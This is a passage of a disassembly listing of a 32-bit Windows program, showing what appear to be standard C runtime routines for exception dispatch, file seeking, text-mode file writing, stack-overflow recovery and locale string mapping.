cmp [ebp+arg_14], 0
jnz short loc_42540E
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_425165
add esp, 20h
jmp short loc_4253E0
; ---------------------------------------------------------------------------
loc_42540E: ; CODE XREF: sub_425221+1CB�j
jmp sub_4254B5
sub_425221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425413 proc near ; CODE XREF: seg000:0041FF6A�p
; sub_41FFBA+12C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
mov eax, [esi]
push edi
and eax, 1FFFFFFFh
mov edi, 19930520h
cmp eax, edi
jz short loc_425430
call sub_4254E2
loc_425430: ; CODE XREF: sub_425413+16�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_425458
cmp dword ptr [esi+4], 0
jz short loc_4254AE
cmp [ebp+arg_14], 0
jnz short loc_4254AE
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_424CB7
add esp, 10h
jmp short loc_4254AE
; ---------------------------------------------------------------------------
loc_425458: ; CODE XREF: sub_425413+24�j
cmp dword ptr [esi+0Ch], 0
jz short loc_4254AE
cmp dword ptr [eax], 0E06D7363h
jnz short loc_425492
cmp [eax+14h], edi
jbe short loc_425492
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_425492
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_4254B1
; ---------------------------------------------------------------------------
loc_425492: ; CODE XREF: sub_425413+51�j
; sub_425413+56�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_425221
add esp, 20h
loc_4254AE: ; CODE XREF: sub_425413+2A�j
; sub_425413+30�j ...
xor eax, eax
inc eax
loc_4254B1: ; CODE XREF: sub_425413+7D�j
pop edi
pop esi
pop ebp
retn
sub_425413 endp
; =============== S U B R O U T I N E =======================================
sub_4254B5 proc near ; CODE XREF: sub_425221:loc_42540E�j
; sub_4254E2+19�p ...
; FUNCTION CHUNK AT 00428224 SIZE 00000018 BYTES
push 8
push offset dword_439C08
call sub_425F14
mov eax, ds:dword_4E2994
test eax, eax
jz short loc_4254DD
and dword ptr [ebp-4], 0
call eax
jmp short loc_4254D9
; ---------------------------------------------------------------------------
dw 0C033h
dd 658BC340h
db 0E8h
; ---------------------------------------------------------------------------
loc_4254D9: ; CODE XREF: sub_4254B5+1B�j
or dword ptr [ebp-4], 0FFFFFFFFh
loc_4254DD: ; CODE XREF: sub_4254B5+13�j
jmp loc_428224
sub_4254B5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4254E2 proc near ; CODE XREF: sub_420131+23�p
; sub_420131:loc_42019B�p ...
push 8
push offset dword_439C18
call sub_425F14
mov eax, ds:off_443A70
test eax, eax
jz short loc_42550A
and dword ptr [ebp-4], 0
call eax ; sub_4254B5
jmp short loc_425506
; ---------------------------------------------------------------------------
db 33h
dd 8BC340C0h
db 65h, 0E8h
; ---------------------------------------------------------------------------
loc_425506: ; CODE XREF: sub_4254E2+1B�j
or dword ptr [ebp-4], 0FFFFFFFFh
loc_42550A: ; CODE XREF: sub_4254E2+13�j
jmp sub_4254B5
sub_4254E2 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425510 proc near ; CODE XREF: sub_420218+45�p
; sub_424CB7+62�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_420341
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_42554F
mov ecx, 2
loc_42554F: ; CODE XREF: sub_425510+38�j
push ecx
call sub_420341
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_425510 endp
; ---------------------------------------------------------------------------
dword_42555C dd 24748B56h, 81068B08h, 6D736338h, 831C75E0h, 75031078h
; DATA XREF: seg002:004437A4�o
; seg002:00443A68�o
dd 14408B16h, 9305203Dh, 3D077419h, 19930521h, 2EE80575h
dd 0A1FFFFFFh, 4E2998h, 1474C085h, 2C76E850h, 0C0850000h
dd 56097459h, 299815FFh, 2EB004Eh, 0C25EC033h, 5C680004h
dd 0FF004255h, 42B18015h, 2998A300h, 0C033004Eh, 9835FFC3h
dd 0FF004E29h, 42B18015h
db 0, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4255CA(double)
sub_4255CA proc near ; CODE XREF: sub_4203C0+7�j
; sub_4203C0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_443A80
call sub_427AA6
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_425650
call sub_427978
test eax, eax
pop ecx
pop ecx
jle short loc_425633
cmp eax, 2
jle short loc_425625
cmp eax, 3
jnz short loc_425633
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_427833
add esp, 10h
jmp short loc_425699
; ---------------------------------------------------------------------------
loc_425625: ; CODE XREF: sub_4255CA+3F�j
push esi
push ebx
call sub_427AA6
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_425699
; ---------------------------------------------------------------------------
loc_425633: ; CODE XREF: sub_4255CA+3A�j
; sub_4255CA+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_439B68
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_425691
; ---------------------------------------------------------------------------
loc_425650: ; CODE XREF: sub_4255CA+2F�j
call sub_42793D
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fld [ebp+var_8]
pop ecx
fucompp
fnstsw ax
test ah, 44h
jp short loc_425677
loc_425669: ; CODE XREF: sub_4255CA+B0�j
push esi
push ebx
call sub_427AA6
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_425699
; ---------------------------------------------------------------------------
loc_425677: ; CODE XREF: sub_4255CA+9D�j
test bl, 20h
jnz short loc_425669
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_425691: ; CODE XREF: sub_4255CA+84�j
call sub_427885
add esp, 1Ch
loc_425699: ; CODE XREF: sub_4255CA+59�j
; sub_4255CA+67�j ...
pop esi
pop ebx
leave
retn
sub_4255CA endp
; =============== S U B R O U T I N E =======================================
sub_42569D proc near ; CODE XREF: sub_421D41+19A�p
; sub_422124+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
cmp eax, ds:dword_4E2B98
push ebx
push esi
push edi
jnb short loc_425711
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4E2BA0h[ecx*4]
mov ecx, [edi]
shl esi, 3
test byte ptr [ecx+esi+4], 1
jz short loc_425711
push eax
call sub_42696C
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_425718
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:dword_42B0B8 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_4256F5
call ds:dword_42B01C ; RtlGetLastWin32Error
jmp short loc_4256F7
; ---------------------------------------------------------------------------
loc_4256F5: ; CODE XREF: sub_42569D+4E�j
xor eax, eax
loc_4256F7: ; CODE XREF: sub_42569D+56�j
test eax, eax
jz short loc_425704
push eax
call sub_422C0F
pop ecx
jmp short loc_425722
; ---------------------------------------------------------------------------
loc_425704: ; CODE XREF: sub_42569D+5C�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, ebx
jmp short loc_425725
; ---------------------------------------------------------------------------
loc_425711: ; CODE XREF: sub_42569D+D�j
; sub_42569D+2A�j
and ds:dword_4E28F8, 0
loc_425718: ; CODE XREF: sub_42569D+36�j
mov ds:dword_4E28F4, 9
loc_425722: ; CODE XREF: sub_42569D+65�j
or eax, 0FFFFFFFFh
loc_425725: ; CODE XREF: sub_42569D+72�j
pop edi
pop esi
pop ebx
retn
sub_42569D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp-0Ch], esi
jge short loc_425745
mov [edi+4], ebx
loc_425745: ; CODE XREF: seg000:00425740�j
push 1
push ebx
push esi
call sub_42569D
add esp, 0Ch
cmp eax, ebx
mov [ebp-4], eax
jl short loc_4257C2
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_42576A
sub eax, [edi+4]
jmp loc_42587D
; ---------------------------------------------------------------------------
loc_42576A: ; CODE XREF: seg000:00425760�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp-8], ebx
jz short loc_4257B4
mov edx, esi
sar edx, 5
mov edx, ds:dword_4E2BA0[edx*4]
mov ebx, esi
and ebx, 1Fh
test byte ptr [edx+ebx*8+4], 80h
jz short loc_4257A6
mov edx, ecx
cmp edx, eax
jnb short loc_4257A6
loc_425799: ; CODE XREF: seg000:004257A4�j
cmp byte ptr [edx], 0Ah
jnz short loc_4257A1
inc dword ptr [ebp-8]
loc_4257A1: ; CODE XREF: seg000:0042579C�j
inc edx
cmp edx, [edi]
jb short loc_425799
loc_4257A6: ; CODE XREF: seg000:00425791�j
; seg000:00425797�j ...
cmp dword ptr [ebp-4], 0
jnz short loc_4257CA
mov eax, [ebp-8]
jmp loc_42587D
; ---------------------------------------------------------------------------
loc_4257B4: ; CODE XREF: seg000:00425779�j
test dl, dl
js short loc_4257A6
mov ds:dword_4E28F4, 16h
loc_4257C2: ; CODE XREF: seg000:00425756�j
or eax, 0FFFFFFFFh
jmp loc_42587D
; ---------------------------------------------------------------------------
loc_4257CA: ; CODE XREF: seg000:004257AA�j
test byte ptr [edi+0Ch], 1
jz loc_425875
mov edx, [edi+4]
test edx, edx
jnz short loc_4257E3
and [ebp-8], edx
jmp loc_425875
; ---------------------------------------------------------------------------
loc_4257E3: ; CODE XREF: seg000:004257D9�j
sub eax, ecx
add eax, edx
mov [ebp+8], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4E2BA0h[eax*4]
mov eax, [ebx]
shl esi, 3
test byte ptr [esi+eax+4], 80h
jz short loc_42586F
push 2
push 0
push dword ptr [ebp-0Ch]
call sub_42569D
add esp, 0Ch
cmp eax, [ebp-4]
jnz short loc_425836
mov eax, [edi+8]
mov ecx, [ebp+8]
add ecx, eax
jmp short loc_42582C
; ---------------------------------------------------------------------------
loc_425823: ; CODE XREF: seg000:0042582E�j
cmp byte ptr [eax], 0Ah
jnz short loc_42582B
inc dword ptr [ebp+8]
loc_42582B: ; CODE XREF: seg000:00425826�j
inc eax
loc_42582C: ; CODE XREF: seg000:00425821�j
cmp eax, ecx
jb short loc_425823
test byte ptr [edi+0Dh], 20h
jmp short loc_42586A
; ---------------------------------------------------------------------------
loc_425836: ; CODE XREF: seg000:00425817�j
push 0
push dword ptr [ebp-4]
push dword ptr [ebp-0Ch]
call sub_42569D
mov eax, 200h
add esp, 0Ch
cmp [ebp+8], eax
ja short loc_42585D
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_42585D
test ch, 4
jz short loc_425860
loc_42585D: ; CODE XREF: seg000:0042584E�j
; seg000:00425856�j
mov eax, [edi+18h]
loc_425860: ; CODE XREF: seg000:0042585B�j
mov [ebp+8], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_42586A: ; CODE XREF: seg000:00425834�j
jz short loc_42586F
inc dword ptr [ebp+8]
loc_42586F: ; CODE XREF: seg000:00425803�j
; seg000:loc_42586A�j
mov eax, [ebp+8]
sub [ebp-4], eax
loc_425875: ; CODE XREF: seg000:004257CE�j
; seg000:004257DE�j
mov eax, [ebp-8]
mov ecx, [ebp-4]
add eax, ecx
loc_42587D: ; CODE XREF: seg000:00425765�j
; seg000:004257AF�j ...
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=39Ch
sub_425882 proc near ; CODE XREF: seg000:00420823�p
; sub_420FC7+2C�p ...
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-39Ch]
sub esp, 41Ch
mov ecx, [ebp+39Ch+arg_0]
cmp ecx, ds:dword_4E2B98
mov eax, ds:dword_4437D4
push ebx
push esi
mov [ebp+39Ch+var_4], eax
push edi
jnb loc_425A48
mov eax, ecx
sar eax, 5
lea ebx, ds:4E2BA0h[eax*4]
mov eax, [ebx]
mov esi, ecx
and esi, 1Fh
shl esi, 3
mov al, [eax+esi+4]
test al, 1
mov [ebp+39Ch+var_41C], ebx
jz loc_425A48
xor edi, edi
cmp [ebp+39Ch+arg_8], edi
mov [ebp+39Ch+var_410], edi
mov [ebp+39Ch+var_418], edi
jnz short loc_4258EC
loc_4258E5: ; CODE XREF: sub_425882+1A9�j
xor eax, eax
jmp loc_425A5C
; ---------------------------------------------------------------------------
loc_4258EC: ; CODE XREF: sub_425882+61�j
test al, 20h
jz short loc_4258FD
push 2
push edi
push edi
push ecx
call sub_42823C
add esp, 10h
loc_4258FD: ; CODE XREF: sub_425882+6C�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_4259D2
cmp [ebp+39Ch+arg_8], edi
mov eax, [ebp+39Ch+arg_4]
mov [ebp+39Ch+var_40C], eax
mov [ebp+39Ch+arg_0], edi
jbe loc_425A19
loc_425926: ; CODE XREF: sub_425882+119�j
mov ecx, [ebp+39Ch+var_40C]
sub ecx, [ebp+39Ch+arg_4]
lea eax, [ebp+39Ch+var_408]
loc_425932: ; CODE XREF: sub_425882+DB�j
cmp ecx, [ebp+39Ch+arg_8]
jnb short loc_42595F
mov edx, [ebp+39Ch+var_40C]
inc [ebp+39Ch+var_40C]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_425950
inc [ebp+39Ch+var_418]
mov byte ptr [eax], 0Dh
inc eax
inc edi
loc_425950: ; CODE XREF: sub_425882+C4�j
mov ebx, [ebp+39Ch+var_41C]
mov [eax], dl
inc eax
inc edi
cmp edi, 400h
jl short loc_425932
loc_42595F: ; CODE XREF: sub_425882+B6�j
mov edi, eax
lea eax, [ebp+39Ch+var_408]
sub edi, eax
push 0
lea eax, [ebp+39Ch+var_414]
push eax
push edi
lea eax, [ebp+39Ch+var_408]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_42B084 ; WriteFile
test eax, eax
jz short loc_42599F
mov eax, [ebp+39Ch+var_414]
add [ebp+39Ch+var_410], eax
cmp eax, edi
jl short loc_4259AB
mov eax, [ebp+39Ch+var_40C]
sub eax, [ebp+39Ch+arg_4]
xor edi, edi
cmp eax, [ebp+39Ch+arg_8]
jb short loc_425926
jmp short loc_4259AD
; ---------------------------------------------------------------------------
loc_42599F: ; CODE XREF: sub_425882+FC�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov [ebp+39Ch+arg_0], eax
loc_4259AB: ; CODE XREF: sub_425882+106�j
xor edi, edi
loc_4259AD: ; CODE XREF: sub_425882+11B�j
; sub_425882+179�j ...
mov eax, [ebp+39Ch+var_410]
cmp eax, edi
jnz loc_425A43
cmp [ebp+39Ch+arg_0], edi
jz short loc_425A19
push 5
pop eax
cmp [ebp+39Ch+arg_0], eax
jnz short loc_425A0B
mov ds:dword_4E28F8, eax
jmp short loc_425A4F
; ---------------------------------------------------------------------------
loc_4259D2: ; CODE XREF: sub_425882+83�j
push edi
lea ecx, [ebp+39Ch+var_414]
push ecx
push [ebp+39Ch+arg_8]
push [ebp+39Ch+arg_4]
push dword ptr [eax]
call ds:dword_42B084 ; WriteFile
test eax, eax
jz short loc_4259FD
mov eax, [ebp+39Ch+var_414]
mov [ebp+39Ch+arg_0], edi
mov [ebp+39Ch+var_410], eax
jmp short loc_4259AD
; ---------------------------------------------------------------------------
loc_4259FD: ; CODE XREF: sub_425882+16B�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov [ebp+39Ch+arg_0], eax
jmp short loc_4259AD
; ---------------------------------------------------------------------------
loc_425A0B: ; CODE XREF: sub_425882+147�j
push [ebp+39Ch+arg_0]
call sub_422C0F
pop ecx
jmp short loc_425A59
; ---------------------------------------------------------------------------
loc_425A19: ; CODE XREF: sub_425882+9E�j
; sub_425882+13C�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_425A31
mov eax, [ebp+39Ch+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_4258E5
loc_425A31: ; CODE XREF: sub_425882+19E�j
mov ds:dword_4E28F4, 1Ch
mov ds:dword_4E28F8, edi
jmp short loc_425A59
; ---------------------------------------------------------------------------
loc_425A43: ; CODE XREF: sub_425882+130�j
sub eax, [ebp+39Ch+var_418]
jmp short loc_425A5C
; ---------------------------------------------------------------------------
loc_425A48: ; CODE XREF: sub_425882+28�j
; sub_425882+4D�j
and ds:dword_4E28F8, 0
loc_425A4F: ; CODE XREF: sub_425882+14E�j
mov ds:dword_4E28F4, 9
loc_425A59: ; CODE XREF: sub_425882+195�j
; sub_425882+1BF�j
or eax, 0FFFFFFFFh
loc_425A5C: ; CODE XREF: sub_425882+65�j
; sub_425882+1C4�j
mov ecx, [ebp+39Ch+var_4]
pop edi
pop esi
pop ebx
call sub_422B83
add ebp, 39Ch
leave
retn
sub_425882 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 4
pop eax
call sub_41EA20
mov esi, esp
push 1Ch
lea eax, [ebp-28h]
push eax
push esi
call ds:dword_42B178 ; VirtualQuery
test eax, eax
jz short loc_425B0D
mov ebx, [ebp-24h]
lea eax, [ebp-4Ch]
push eax
call ds:dword_42B0F4 ; GetSystemInfo
mov ecx, [ebp-48h]
mov eax, ds:dword_4E2900
lea edi, [ecx-1]
not edi
and edi, esi
sub edi, ecx
mov esi, eax
dec esi
neg esi
sbb esi, esi
and esi, 0FFFFFFF1h
add esi, 11h
imul esi, ecx
add esi, ebx
cmp edi, esi
mov [ebp-8], ecx
jb short loc_425B0D
cmp eax, 1
jz short loc_425B2E
mov [ebp-4], ebx
mov ebx, 1000h
loc_425ADA: ; CODE XREF: seg000:00425AF6�j
push 1Ch
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-4]
call ds:dword_42B178 ; VirtualQuery
test eax, eax
jz short loc_425B0D
mov eax, [ebp-1Ch]
add [ebp-4], eax
test [ebp-18h], ebx
jz short loc_425ADA
test byte ptr [ebp-13h], 1
mov eax, [ebp-28h]
mov [ebp-4], eax
jz short loc_425B09
xor eax, eax
inc eax
jmp short loc_425B4D
; ---------------------------------------------------------------------------
loc_425B09: ; CODE XREF: seg000:00425B02�j
cmp edi, eax
jnb short loc_425B11
loc_425B0D: ; CODE XREF: seg000:00425A94�j
; seg000:00425ACB�j ...
xor eax, eax
jmp short loc_425B4D
; ---------------------------------------------------------------------------
loc_425B11: ; CODE XREF: seg000:00425B0B�j
cmp eax, esi
jnb short loc_425B18
mov [ebp-4], esi
loc_425B18: ; CODE XREF: seg000:00425B13�j
push 4
push ebx
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_42B1B8 ; VirtualAlloc
mov eax, ds:dword_4E2900
jmp short loc_425B31
; ---------------------------------------------------------------------------
loc_425B2E: ; CODE XREF: seg000:00425AD0�j
mov [ebp-4], edi
loc_425B31: ; CODE XREF: seg000:00425B2C�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp-0Ch]
push ecx
inc eax
push eax
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_42B17C ; VirtualProtect
loc_425B4D: ; CODE XREF: seg000:00425B07�j
; seg000:00425B0F�j
lea esp, [ebp-58h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_425B55 proc near ; CODE XREF: sub_420B27+9E�p
; sub_422D8A+C5�p ...
push 38h
push offset dword_439C28
call sub_425F14
xor ebx, ebx
cmp ds:dword_4E29BC, ebx
jnz short loc_425BA3
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_439C24
push 100h
push ebx
call ds:dword_42B170 ; LCMapStringW
test eax, eax
jz short loc_425B8E
mov ds:dword_4E29BC, esi
jmp short loc_425BA3
; ---------------------------------------------------------------------------
loc_425B8E: ; CODE XREF: sub_425B55+2F�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_425BA3
mov ds:dword_4E29BC, 2
loc_425BA3: ; CODE XREF: sub_425B55+14�j
; sub_425B55+37�j ...
cmp [ebp+14h], ebx
jle short loc_425BC3
mov ecx, [ebp+14h]
mov eax, [ebp+10h]
loc_425BAE: ; CODE XREF: sub_425B55+61�j
dec ecx
cmp [eax], bl
jz short loc_425BBB
inc eax
cmp ecx, ebx
jnz short loc_425BAE
or ecx, 0FFFFFFFFh
loc_425BBB: ; CODE XREF: sub_425B55+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+14h], eax
loc_425BC3: ; CODE XREF: sub_425B55+51�j
mov eax, ds:dword_4E29BC
cmp eax, 2
jz loc_425DAD
cmp eax, ebx
jz loc_425DAD
cmp eax, 1
jnz loc_425DE0
xor edi, edi
mov [ebp-2Ch], edi
mov [ebp-38h], ebx
mov [ebp-34h], ebx
cmp [ebp+20h], ebx
jnz short loc_425BFA
mov eax, ds:dword_4E29B4
mov [ebp+20h], eax
loc_425BFA: ; CODE XREF: sub_425B55+9B�j
push ebx
push ebx
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
xor eax, eax
cmp [ebp+24h], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push dword ptr [ebp+20h]
call ds:dword_42B07C ; MultiByteToWideChar
mov esi, eax
mov [ebp-30h], esi
cmp esi, ebx
jz loc_425DE0
mov dword ptr [ebp-4], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov eax, esp
mov [ebp-1Ch], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_425C66
; ---------------------------------------------------------------------------
db 33h
dd 8BC340C0h, 1BE8E865h, 33FFFFFEh, 0E45D89DBh, 0FFFC4D83h
dd 8BD47D8Bh
db 75h, 0D0h
; ---------------------------------------------------------------------------
loc_425C66: ; CODE XREF: sub_425B55+F4�j
cmp [ebp-1Ch], ebx
jnz short loc_425C87
lea eax, [esi+esi]
push eax
call sub_41E5D3
pop ecx
mov [ebp-1Ch], eax
cmp eax, ebx
jz loc_425DE0
mov dword ptr [ebp-38h], 1
loc_425C87: ; CODE XREF: sub_425B55+114�j
push esi
push dword ptr [ebp-1Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push 1
push dword ptr [ebp+20h]
call ds:dword_42B07C ; MultiByteToWideChar
test eax, eax
jz loc_425D8A
push ebx
push ebx
push esi
push dword ptr [ebp-1Ch]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B170 ; LCMapStringW
mov edi, eax
mov [ebp-2Ch], edi
cmp edi, ebx
jz loc_425D8A
test byte ptr [ebp+0Dh], 4
jz short loc_425CF6
cmp [ebp+1Ch], ebx
jz loc_425D8A
cmp edi, [ebp+1Ch]
jg loc_425D8A
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push esi
push dword ptr [ebp-1Ch]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B170 ; LCMapStringW
jmp loc_425D8A
; ---------------------------------------------------------------------------
loc_425CF6: ; CODE XREF: sub_425B55+172�j
mov dword ptr [ebp-4], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov eax, esp
mov [ebp-20h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_425D34
; ---------------------------------------------------------------------------
db 33h, 0C0h, 40h
dd 0E8658BC3h, 0FFFD4DE8h, 89DB33FFh, 4D83E05Dh, 7D8BFFFCh
dd 0D0758BD4h
; ---------------------------------------------------------------------------
loc_425D34: ; CODE XREF: sub_425B55+1C2�j
cmp [ebp-20h], ebx
jnz short loc_425D51
lea eax, [edi+edi]
push eax
call sub_41E5D3
pop ecx
mov [ebp-20h], eax
cmp eax, ebx
jz short loc_425D8A
mov dword ptr [ebp-34h], 1
loc_425D51: ; CODE XREF: sub_425B55+1E2�j
push edi
push dword ptr [ebp-20h]
push esi
push dword ptr [ebp-1Ch]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B170 ; LCMapStringW
test eax, eax
jz short loc_425D8A
push ebx
push ebx
cmp [ebp+1Ch], ebx
jnz short loc_425D74
push ebx
push ebx
jmp short loc_425D7A
; ---------------------------------------------------------------------------
loc_425D74: ; CODE XREF: sub_425B55+219�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
loc_425D7A: ; CODE XREF: sub_425B55+21D�j
push edi
push dword ptr [ebp-20h]
push ebx
push dword ptr [ebp+20h]
call ds:dword_42B090 ; WideCharToMultiByte
mov edi, eax
loc_425D8A: ; CODE XREF: sub_425B55+149�j
; sub_425B55+168�j ...
cmp [ebp-34h], ebx
jz short loc_425D98
push dword ptr [ebp-20h]
call sub_41E2A1
pop ecx
loc_425D98: ; CODE XREF: sub_425B55+238�j
cmp [ebp-38h], ebx
jz short loc_425DA6
push dword ptr [ebp-1Ch]
call sub_41E2A1
pop ecx
loc_425DA6: ; CODE XREF: sub_425B55+246�j
mov eax, edi
jmp loc_425F08
; ---------------------------------------------------------------------------
loc_425DAD: ; CODE XREF: sub_425B55+76�j
; sub_425B55+7E�j
mov [ebp-28h], ebx
xor edi, edi
mov [ebp-3Ch], ebx
cmp [ebp+8], ebx
jnz short loc_425DC2
mov eax, ds:dword_4E29A4
mov [ebp+8], eax
loc_425DC2: ; CODE XREF: sub_425B55+263�j
cmp [ebp+20h], ebx
jnz short loc_425DCF
mov eax, ds:dword_4E29B4
mov [ebp+20h], eax
loc_425DCF: ; CODE XREF: sub_425B55+270�j
push dword ptr [ebp+8]
call sub_4282DB
pop ecx
mov [ebp-40h], eax
cmp eax, 0FFFFFFFFh
jnz short loc_425DE7
loc_425DE0: ; CODE XREF: sub_425B55+87�j
; sub_425B55+CD�j ...
xor eax, eax
jmp loc_425F08
; ---------------------------------------------------------------------------
loc_425DE7: ; CODE XREF: sub_425B55+289�j
cmp eax, [ebp+20h]
jz loc_425EDE
push ebx
push ebx
lea ecx, [ebp+14h]
push ecx
push dword ptr [ebp+10h]
push eax
push dword ptr [ebp+20h]
call sub_42831E
add esp, 18h
mov [ebp-28h], eax
cmp eax, ebx
jz short loc_425DE0
push ebx
push ebx
push dword ptr [ebp+14h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B174 ; LCMapStringA
mov esi, eax
mov [ebp-24h], esi
cmp esi, ebx
jz loc_425ECD
mov [ebp-4], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov edi, esp
mov [ebp-44h], edi
push esi
push ebx
push edi
call sub_41E5F0
add esp, 0Ch
jmp short loc_425E5E
; ---------------------------------------------------------------------------
dw 0C033h
dd 658BC340h, 0FC18E8E8h, 0DB33FFFFh
db 33h, 0FFh
; ---------------------------------------------------------------------------
loc_425E5E: ; CODE XREF: sub_425B55+2F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_425E89
push dword ptr [ebp-24h]
call sub_41E5D3
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_425EA6
push dword ptr [ebp-24h]
push ebx
push edi
call sub_41E5F0
add esp, 0Ch
mov dword ptr [ebp-3Ch], 1
loc_425E89: ; CODE XREF: sub_425B55+30F�j
push dword ptr [ebp-24h]
push edi
push dword ptr [ebp+14h]
